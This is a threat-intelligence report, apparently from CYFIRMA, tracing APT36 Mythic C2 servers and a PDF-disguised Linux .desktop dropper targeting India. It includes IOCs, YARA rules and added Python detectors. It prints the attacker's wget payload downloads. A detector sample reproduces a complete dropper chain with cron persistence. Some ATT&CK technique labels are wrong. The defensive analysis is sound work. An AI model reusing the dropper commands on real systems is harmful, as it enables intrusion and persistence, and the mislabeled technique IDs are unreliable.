OSINT Analysis: Tracking Malicious Infrastructure Associated with Transparent Tribe – CYFIRMA

Short Summary:

This report by CYFIRMA investigates the infrastructure of the APT group “Transparent Tribe,” identifying command-and-control (C2) servers linked to the group. The investigation reveals the use of Mythic Poseidon binaries and Linux desktop entry files as attack vectors, targeting individuals in India. The report emphasizes the evolving tactics of Transparent Tribe and the persistent threat they pose.

Key Points:

  • The investigation tracks the infrastructure of the APT group “Transparent Tribe” (APT36) and identifies C2 servers.
  • Prompted by a Twitter post, the investigation focused on two IPs linked to Transparent Tribe’s C2 servers, which are part of the Mythic C2 infrastructure.
  • Utilizing JARM fingerprinting, 15 malicious hosts were identified, all linked to ongoing attacks using customized payloads targeting the Indian region.
  • The group employs malicious Linux desktop entry files disguised as PDFs to establish persistence and evade detection.
  • APT36 is increasingly targeting Linux environments, particularly with the use of Debian-based operating systems in Indian government sectors.
  • The report provides insights into the infrastructure, methods, and tools used by APT36, highlighting their Linux-based attack campaign.

MITRE ATT&CK TTPs – created by AI

  • T1566 – Phishing
    • Spear phishing Attachment
  • T1059 – User Execution
    • Malicious File
    • Command and Scripting Interpreter
  • T1547 – Boot or Logon Autostart Execution
  • T1027 – Obfuscated Files or Information
  • T1564.001 – Hide Artifacts: Hidden Files and Directories
  • T1070.004 – Indicator Removal: File Deletion
  • T1082 – System Information Discovery
  • T1083 – File & Directory Discovery
  • T1071.001 – Application Layer Protocol: Web Protocols
  • T1113 – Screen Capture
  • T1048 – Exfiltration over Alternative Protocol

Published On: 2024-09-27

OSINT Investigation: Hunting Malicious Infrastructure Linked to Transparent Tribe

EXECUTIVE SUMMARY

At CYFIRMA, we provide timely insights into emerging threats and malicious tactics targeting organizations and individuals. This report details an investigation aimed at tracking infrastructure linked to the APT group “Transparent Tribe” and identified potential command-and-control (C2) servers associated with this threat actor.

15 malicious hosts were identified – hosted by DigitalOcean – and the threat actor was also found to be employing Linux desktop entry files as a novel attack vector, targeting individuals in India.

The report highlights the use of Mythic Poseidon binaries as C2 agents, and the tactics used to evade security and maintain persistence, all of which underscore the continued threat posed by Transparent Tribe and its evolving techniques.

INTRODUCTION

This open-source intelligence (OSINT) investigation seeks to expose the infrastructure tied to the APT group “Transparent Tribe,” with a focus on identifying command-and-control (C2) servers. The investigation was initiated following a Twitter post from security researcher “@PrakkiSathwik,” which flagged the IP addresses 206.189.134.185 and 143.198.64.151 as C2 servers linked to the group.

We chose 143.198.64.151 as the primary pivot point for the investigation. The IP, hosted by DigitalOcean under ASN AS14061, has been identified as a Mythic C2 server, running services on ports 22 (SSH), 80 (HTTP), and 7443 (HTTPS). Mythic is a cross-platform, post-exploitation framework designed for red teaming but has increasingly been misused by threat actors for malicious purposes. Its collaborative, web-based interface and modular architecture allow attackers to efficiently – and remotely – control compromised systems.

To further investigate this infrastructure, we used JARM – a tool that fingerprints servers based on their TLS configurations – and HTML title metadata to identify additional hosts running the Mythic C2 framework. We found that the infrastructure consisted of 15 IPs, hosted on DigitalOcean, all linked to the Mythic exploitation framework.

Our investigation also revealed that the attack campaign uses Linux desktop entry files to deploy malicious payloads: these files, which were first seen uploaded from India, suggest that the targets of this campaign are possibly individuals within the region, which aligns with Transparent Tribe’s history of targeting Indian government officials through phishing and other attack vectors.

In this report, we focus on tracing the malicious infrastructure while providing insight into the deployment of Mythic agents and the tactics used by the threat actor.

KEY POINTS

  • The report focuses on tracking the infrastructure of the APT group “Transparent Tribe” (APT36), identifying C2 servers.
  • The investigation was prompted by a Twitter post identifying two IPs linked to Transparent Tribe’s C2 servers. The servers are part of Mythic C2 infrastructure, a cross-platform post-exploitation framework used for red teaming which is also abused by threat actors like Transparent Tribe for managing compromised systems.
  • The JARM fingerprinting technique initially identified 31,390 servers, which were narrowed down to 15 servers associated with the same malicious infrastructure. These servers, including the pivot IP 143.198.64.151, were found to be hosting Mythic C2 servers and linked to ongoing attacks utilizing customized payloads, such as the Poseidon agent, potentially targeting the Indian region.
  • The group is distributing malicious Linux desktop entry files disguised as PDFs. These files execute scripts to download and run malicious binaries from remote servers, establishing persistent access and evading detection.
  • APT36 is increasingly targeting Linux environments due to their widespread use in Indian government sectors, particularly with the Debian-based BOSS OS and the introduction of Maya OS.
  • This report outlines the infrastructure, methods, and tools used by APT36, providing insights into their Linux-based attack campaign and the evolving threat specifically to India.

ANALYSIS:

Basic Details:
Pivot Point IP: 143[.]198[.]64[.]151 (C2)

The objective of this OSINT investigation is to track the infrastructure associated with the APT group “Transparent Tribe” and identify other potential hosts or servers that may be functioning as C2 servers for this threat actor.

The investigation was initiated based on a Twitter post from the security researcher “@PrakkiSathwik,” who identified the IP addresses “206.189.134.185” and “143.198.64.151” as C2 servers linked to the “Transparent Tribe” group.

Our investigation begins with the IP address “143.198.64.151” as the primary pivot point.

The IP address has been flagged as malicious by multiple security solutions. The server is associated with activity related to “MYTHIC,” a C2 server. Mythic C2 is a cross-platform, post-exploitation framework commonly used in red teaming operations. It is designed to offer a collaborative, user-friendly interface for operators, managers, and reporting, facilitating efficient coordination and execution throughout red teaming engagements.

Our OSINT investigation reveals the IP address is linked to the hosting provider “DigitalOcean” under ASN number “AS14061,” with the location identified as the United States. The server is running services on ports 22/SSH, 80/HTTP, and 7443/HTTP.

We selected two key pivot points for further investigation based on the available data: the “JARM” fingerprint and the “HTML Title” with the value “Mythic.” JARM is a tool designed to fingerprint servers based on their TLS configurations. It sends a series of unique requests to a server and analyzes the responses to generate a fingerprint which can then be used to identify and categorize servers, helping security teams detect malicious or suspicious infrastructure. JARM aids in identifying servers that may be part of malicious networks, command and control systems, or other harmful activities, even when traditional indicators like IP addresses and domains change.

We constructed the following Censys query to hunt for servers/hosts with the same JARM fingerprint:

services.jarm.fingerprint="1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e"

This query led us to a total of 31,390 hosts.

The second attribute, “Mythic,” refers to the string found in the “HTML Title.” We refined our query by combining both attributes:

services.jarm.fingerprint="1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e" and services.http.response.html_title="Mythic"

This reduced the results to 63 hosts, providing a more focused list. However, for further accuracy, we added a third pivot point: the hosting provider “Digital Ocean.”

The final query, incorporating three attributes – JARM fingerprint, HTML Title, and ASN Name – narrowed the results down to 15 hosts.

(services.jarm.fingerprint="1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e" and services.http.response.html_title="Mythic") and autonomous_system.name=`DIGITALOCEAN-ASN`

The resultant 15 IPs are provided below:


These IPs are part of a malicious infrastructure, hosting the open-source Mythic exploitation framework, and serve as C2 servers for Mythic agents to execute actions directed by the threat actor.

Many security solutions tagged these IPs as malicious and linked them to “Mythic” activity, indicating their role as C2 servers for the Mythic framework.

As mentioned earlier, Mythic is an open-source, cross-platform post-exploitation framework, widely used for red teaming and offensive security operations. It is built using Python3, Docker, and Docker-Compose, features a user-friendly web-based interface, and is designed to support collaborative efforts among operators, providing a centralized platform for managing compromised systems, delivering payloads, and executing commands in a stealthy manner.

While Mythic is legitimate software intended for penetration testing and red-teaming, it has also been co-opted by threat actors for malicious purposes. In this context, the identified IPs are being utilized by adversaries to control Mythic agents deployed on compromised systems, functioning as a C2 server to execute commands and exfiltrate data.

The C2 panel for Mythic Poseidon is accessible via the URI path /new/login on these server IPs at port 7443. For example, the C2 panel hosted on the server at IP address 143[.]198[.]64[.]151 can be reached at https[:]//143[.]198[.]64[.]151[:]7443/new/login.

Similarly, the panel on 165[.]232[.]118[.]207 is reachable at https[:]//165[.]232[.]118[.]207[:]7443/new/login, and the same path applies to the other IPs in the list (https[:]//Other_IP[:]7443/new/login).

ETLM ATTRIBUTION

The CYFIRMA research team is committed to the ongoing investigation of emerging threats, malware, and the tactics, techniques, and procedures (TTPs) employed by malicious actors. We continuously monitor current threats, track ongoing campaigns, assess their evolution, and remain vigilant to new developments in this ever-changing landscape.

We further continue our investigation into our starting IP “143.198.64.151”, which appears to be part of a broader campaign where the threat actor uses Linux desktop entry files as an attack vector. This method was first recorded in May 2023 by researchers and attributed to “Transparent Tribe” where they targeted Indian government officials. A similar pattern is observed in this campaign, involving the use of Linux desktop entry files and Mythic agent binaries. The associated files, which were first seen/uploaded from India, suggest that the campaign may be targeting individuals within the region.

The zip archive Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26), which contains the malicious Linux desktop entry file Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c), is likely distributed either through phishing emails or malicious websites.

ZIP archive:
Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)

Linux Desktop Entry File:
Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)

The Linux desktop entry file size exceeds 1 MB due to the addition of numerous “#” characters, likely an attempt to evade security scans. The image below highlights the extra characters in the inflated file.

Upon removing these extra “#” characters and blank spaces, we got the following script:

The Linux desktop entry file is crafted to look like a legitimate PDF document link but actually performs a series of malicious actions upon execution.

The entry sets Icon=application-pdf and Name[en_US]=Document Details.pdf, so it is displayed as a legitimate PDF file. When the file is opened, it runs a bash command that first opens a decoy PDF hosted on Google Drive (“https[:]//drive.google[.]com/file/d/1akF76sGydk2k-4tTDydq7T9WxMhoT-av/view?usp=sharing”) using xdg-open; the decoy hides the real malicious activity from the user.

Simultaneously, it creates a hidden directory (~/.local/share) on the system where it downloads two malicious files (trs-clip and debian-clip) from two remote servers (157[.]245[.]139[.]146 and 159[.]89[.]165[.]86) by using “wget” command.

wget 157[.]245[.]139[.]146/trs-clip -O ~/.local/share/trs-clip
wget 159[.]89[.]165[.]86/debian-clip -O ~/.local/share/debian-clip

Both files are given executable permissions. trs-clip is started in the background with its output redirected to the null device (/dev/null) to suppress any visible output, and debian-clip is then executed. Next, the script modifies the user’s crontab (the Linux scheduling tool) to establish persistence: it adds entries that run both malicious binaries (trs-clip and debian-clip) on every system reboot. Finally, the script attempts to clean up traces of its presence by removing temporary files.
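As an added illustration (not part of the original report), the following Python checker applies the observations above to a .desktop file: a document-looking Name and Icon paired with a shell Exec line that downloads into a hidden directory and touches crontab, plus a large share of “#” comment lines used as padding. The sample entries, the IP 192.0.2.10 and the decoy URL are constructed for the example and are not indicators from the report.

```python
import re

# Constructed sample modelled on the report's description of
# "Document Details.pdf.desktop": a PDF name and icon, an Exec line that opens
# a decoy, pulls a binary into ~/.local/share and adds a cron entry, followed
# by a run of '#' padding lines (the real file carried over 1 MB of them).
SAMPLE_DESKTOP = (
    "[Desktop Entry]\n"
    "Type=Application\n"
    "Name[en_US]=Document Details.pdf\n"
    "Icon=application-pdf\n"
    "Exec=bash -c \"xdg-open https://example.invalid/decoy.pdf & "
    "mkdir -p ~/.local/share; wget 192.0.2.10/trs-clip -O ~/.local/share/trs-clip; "
    "chmod +x ~/.local/share/trs-clip; ~/.local/share/trs-clip > /dev/null 2>&1 & "
    "(crontab -l; echo '@reboot ~/.local/share/trs-clip') | crontab -\"\n"
    + ("#" * 80 + "\n") * 40
)

# Constructed benign entry for comparison.
BENIGN_DESKTOP = (
    "[Desktop Entry]\nType=Application\nName=Text Editor\n"
    "Icon=accessories-text-editor\nExec=gedit %U\n"
)

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
# "sh -c" also covers "bash -c"; these tokens rarely belong in a document launcher
SHELL_TOKENS = ("sh -c", "wget ", "curl ", "chmod +x", "crontab", "/dev/null", "nohup ")
IP_URL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/[^\s;]*")


def parse_desktop_entry(text):
    """Minimal parser: key/value pairs of the [Desktop Entry] group, skipping '#' comments."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = (line == "[Desktop Entry]")
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def padding_ratio(text):
    """Fraction of lines that are '#' comments; the report's sample was inflated this way."""
    lines = text.splitlines()
    return sum(1 for l in lines if l.startswith("#")) / len(lines) if lines else 0.0


def analyze_desktop_entry(text):
    """Return a list of findings; an empty list means nothing on this checklist fired."""
    findings = []
    ratio = padding_ratio(text)
    if ratio > 0.5:
        findings.append(f"comment padding: {ratio:.0%} of lines are '#' comments")
    entry = parse_desktop_entry(text)
    if not entry:
        return findings + ["no [Desktop Entry] group found"]
    names = [v for k, v in entry.items() if k == "Name" or k.startswith("Name[")]
    exec_line = entry.get("Exec", "")
    if exec_line and any(n.lower().endswith(DOC_EXTENSIONS) for n in names):
        findings.append(f"document-lookalike name with Exec: {names[0]}")
    hits = [t.strip() for t in SHELL_TOKENS if t in exec_line]
    if hits:
        findings.append("shell/download/persistence tokens in Exec: " + ", ".join(hits))
    if hits and entry.get("Icon", "").startswith("application-"):
        findings.append(f"document icon {entry['Icon']} paired with a shell Exec")
    ip = IP_URL.search(exec_line)
    if ip:
        findings.append("Exec fetches from a bare IP address: " + ip.group(0))
    if "/." in exec_line:  # ~/.local, /home/x/.config and similar hidden paths
        findings.append("Exec writes to or runs from a hidden directory")
    return findings
```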

The Linux desktop entry file downloads malicious payloads from the servers at IP addresses:
157[.]245[.]139[.]146, 159[.]89[.]165[.]86.
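The cron persistence described above leaves a recognisable trace in the user crontab. As an added example (not from the report), this Python routine parses a crontab and flags entries that execute from user-writable hidden paths such as ~/.local/share, noting whether they run at boot and discard their output. The crontab text, the user name and the file names are constructed for the example.

```python
import re

# Constructed user crontab modelled on the persistence the report describes:
# both downloaded binaries are relaunched from ~/.local/share at reboot.
# The benign lines show what the check leaves alone.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
@reboot ~/.local/share/trs-clip > /dev/null 2>&1
@reboot /home/user/.local/share/debian-clip >/dev/null 2>&1 &
*/15 * * * * /home/user/bin/backup.sh
"""

# Locations an unprivileged dropper can write to; extend per environment.
USER_WRITABLE_DIRS = ("~/.local/share", "~/.config", "~/.cache", "/tmp/", "/dev/shm/", "/var/tmp/")
HOME_HIDDEN_RE = re.compile(r"^/home/[^/]+/\.")          # /home/<user>/.<hidden>
FIELDS_RE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")     # @reboot-style or 5 time fields


def parse_crontab(text):
    """Yield (schedule, command) for each real entry, skipping comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = FIELDS_RE.match(line)
        if m:
            yield m.group(1).strip(), m.group(2).strip()


def command_path(command):
    """First token of the command, i.e. the program cron will execute."""
    parts = command.split()
    return parts[0] if parts else ""


def flag_entry(schedule, command):
    """Reasons to look at this entry; empty unless the program lives in a user-writable hidden path."""
    reasons = []
    path = command_path(command)
    if schedule == "@reboot":
        reasons.append("runs at boot")
    if path.startswith(USER_WRITABLE_DIRS) or HOME_HIDDEN_RE.match(path):
        reasons.append(f"executes from user-writable hidden path {path}")
    if "/dev/null" in command:
        reasons.append("output discarded")
    # @reboot and /dev/null alone are common in legitimate crontabs; the path is the trigger
    return reasons if any(r.startswith("executes") for r in reasons) else []


def hunt_crontab(text):
    """Return [(schedule, command, reasons)] for every flagged entry."""
    results = []
    for schedule, command in parse_crontab(text):
        reasons = flag_entry(schedule, command)
        if reasons:
            results.append((schedule, command, reasons))
    return results
```

On a live host the same routine can be fed the output of crontab -l for each user and the contents of /etc/cron.d.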

Returning to our starting pivot point, the IP “143[.]198[.]64[.]151”, we identified the file “debian-clip (md5: 242f77b4e65671a55e103b8b26df46a7)” communicating with this IP. Further analysis identified these Linux payloads as Mythic Poseidon binaries.

Poseidon is a Golang-based agent that is compiled into executables for both Linux and macOS x64 platforms. The malicious C2 infrastructure was identified as a result of our OSINT investigation, rather than through technical analysis of the binaries. For a detailed understanding of Poseidon’s functionality and capabilities, which are well documented in the open-source Mythic framework, refer to the GitHub repository: https://github.com/MythicAgents/poseidon.

The use of Mythic as a C2 framework highlights the sophistication of the threat actor behind this infrastructure. Mythic’s capabilities allow for highly customizable payload delivery and interaction with compromised systems, potentially enabling large-scale attacks and persistent access. The IPs we identified during the investigation are associated with Mythic’s activity, which suggests involvement in coordinated cyber operations, possibly involving espionage, data theft, or other malicious actions.

Given the use of Linux desktop entry files, similar scripts and tactics, the deployment of the Mythic exploitation framework, and the Mythic Poseidon binaries observed as Linux payloads in the Indian region, we assess that this campaign and its associated malicious infrastructure are linked to the APT group “Transparent Tribe.”

Transparent Tribe (APT36):
Transparent Tribe, also known as APT36, is a suspected Pakistan-based threat group that has been active since at least 2013. While not highly sophisticated, the group is notably persistent and continually adapts its tactics. APT36 primarily targets Indian government officials, as well as the defense and education sectors.

The group specializes in cyber espionage through credential harvesting and malware distribution. APT36 frequently employs phishing emails and websites to deliver malware, using customized RATs (Remote Access Trojans) and open-source tools such as the Mythic framework. They have also been known to compromise legitimate official applications to enhance their attacks.

APT36 is using malicious Linux binaries as attack vectors due to the widespread use of Linux in the Indian government sector. The Debian-based BOSS OS is used across various ministries and defense forces, creating a large target base. Additionally, the Indian government’s introduction of Maya OS – a Debian-based system, set to replace Windows in government and defense – presents a new opportunity for nation-state actors like APT36 to expand their attacks by targeting Linux environments.

Diamond Model:

CONCLUSION

This investigation successfully tracked and exposed malicious infrastructure linked to the Transparent Tribe (APT36) group by leveraging OSINT techniques. Hunting for C2 servers by pivoting on the flagged IP 143[.]198[.]64[.]151 led to the identification of 15 servers hosted by DigitalOcean, the pivot IP among them. These servers were found to be part of a larger infrastructure using the Mythic exploitation framework, a tool that facilitates control over compromised systems.

The campaign uses Linux desktop entry files as its attack vector, focuses on individuals and systems within the Indian region, and deploys Mythic Poseidon binaries as payloads. By applying techniques such as JARM fingerprinting and HTML metadata pivoting, this investigation provided crucial insight into the operational infrastructure of Transparent Tribe, enabling defenders to understand the scope of their activities and identify patterns for future detection.

The discovery of this infrastructure highlights the growing sophistication and persistence of Transparent Tribe’s tactics, as they continue to adapt and expand their capabilities. The insights gathered from this OSINT investigation will aid in further monitoring and disrupting similar malicious infrastructures in the future.

LIST OF IOCS


MITRE ATT&CK TTPs

  • Initial Access (TA0001)
    • T1566: Phishing
    • T1566.001: Spear phishing Attachment
  • Execution (TA0002)
    • T1059: User Execution
    • T1204.002: Malicious File
    • T1059.004: Command and Scripting Interpreter
  • Persistence (TA0003)
    • T1547: Boot or Logon Autostart Execution
  • Defense Evasion (TA0005)
    • T1027: Obfuscated Files or Information
    • T1564.001: Hide Artifacts: Hidden Files and Directories
    • T1070.004: Indicator Removal: File Deletion
  • Discovery (TA0007)
    • T1082: System Information Discovery
    • T1083: File & Directory Discovery
  • Command and Control (TA0011)
    • T1071.001: Application Layer Protocol: Web Protocols
    • T1113: Screen Capture
    • T1048: Exfiltration over Alternative Protocol

YARA Rules

import "hash"

rule TransparentTribe_Hashes_Detection {
    meta:
        description = "Detection of known hashes associated with Transparent Tribe"
        author = "CRT"

    condition:
        hash.md5(0, filesize) == "242f77b4e65671a55e103b8b26df46a7" or
        hash.md5(0, filesize) == "9d0f1c7825a207a2ad4acd0c9fece794" or
        hash.md5(0, filesize) == "0d7b6773b8bbf9c000f2e4ff04c626e7" or
        hash.md5(0, filesize) == "407ebc6e6d90bef35da9fe1062773543" or
        hash.md5(0, filesize) == "d0a8e733d580fce3bbdad403bf9fd384" or
        hash.md5(0, filesize) == "01d9e52a4b38beb6541c5d3cae265a26" or
        hash.md5(0, filesize) == "e354cf4cc4177e019ad236f8b241ba3c" or
        hash.md5(0, filesize) == "78604255c1386b1d62bd818a9c972e20" or
        hash.md5(0, filesize) == "680619b5858b1a5f785c8af6065f6300"
}

// No module import is needed: the rule matches only on plain strings
// (YARA has no "network" module, and importing one fails to compile).
rule MaliciousInfra_IP_Detection {
    meta:
        description = "Detection of known IP addresses associated with Transparent Tribe"
        author = "CRT"

    strings:
        $ip1 = "143.198.64.151"
        $ip2 = "165.232.118.207"
        $ip3 = "161.35.186.219"
        $ip4 = "178.128.92.166"
        $ip5 = "64.23.155.109"
        $ip6 = "159.203.133.189"
        $ip7 = "138.197.156.131"
        $ip8 = "142.93.74.10"
        $ip9 = "152.42.245.111"
        $ip10 = "139.59.109.136"
        $ip11 = "137.184.211.26"
        $ip12 = "159.223.0.196"
        $ip13 = "64.23.213.61"
        $ip14 = "152.42.198.168"
        $ip15 = "206.189.134.185"

    condition:
        any of ($ip*)
}

RECOMMENDATIONS

  • Deploy strong endpoint security solutions equipped with advanced threat detection and prevention capabilities to effectively identify and stop malicious activities.
  • Keep operating systems, applications, and security software up to date with regular patches to mitigate known vulnerabilities frequently exploited by cyber threats.
  • Implement network segmentation to restrict lateral movement, preventing malware from reaching critical assets and containing potential threats within isolated areas.
  • Conduct comprehensive employee training on recognizing phishing threats, emphasizing the risks associated with opening attachments or clicking links in unsolicited emails.
  • Educate employees to identify social engineering tactics, empowering them to avoid falling prey to deceptive strategies that may lead to the execution of malicious files.
  • Configure firewalls to block outbound communication with known malicious IP addresses and domains associated with command-and-control servers.
  • Employ behavior-based monitoring to detect unusual activity patterns, including suspicious processes attempting unauthorized network connections.
  • Enforce application whitelisting policies to allow only approved applications, thereby preventing the execution of unauthorized or malicious executables.
  • Monitor network traffic for abnormal patterns, such as large data transfers to unfamiliar or suspicious IP addresses, indicating potential threats.
  • Develop a comprehensive incident response plan detailing necessary actions in the event of a malware infection, including isolating affected systems and promptly notifying relevant stakeholders.
  • Stay updated with the latest threat intelligence reports and indicators of compromise related to malware to proactively detect and mitigate potential threats.
  • Implement regular backups of critical data and systems to minimize the impact of ransomware attacks or data loss resulting from malware infections.
  • Follow the principle of least privilege (PoLP) by restricting user permissions to only those necessary for specific roles, reducing the impact of malware that relies on elevated privileges.
  • Establish and maintain defensive measures by monitoring and blocking Indicators of Compromise (IOCs), enhancing defenses based on tactical intelligence and provided rules.
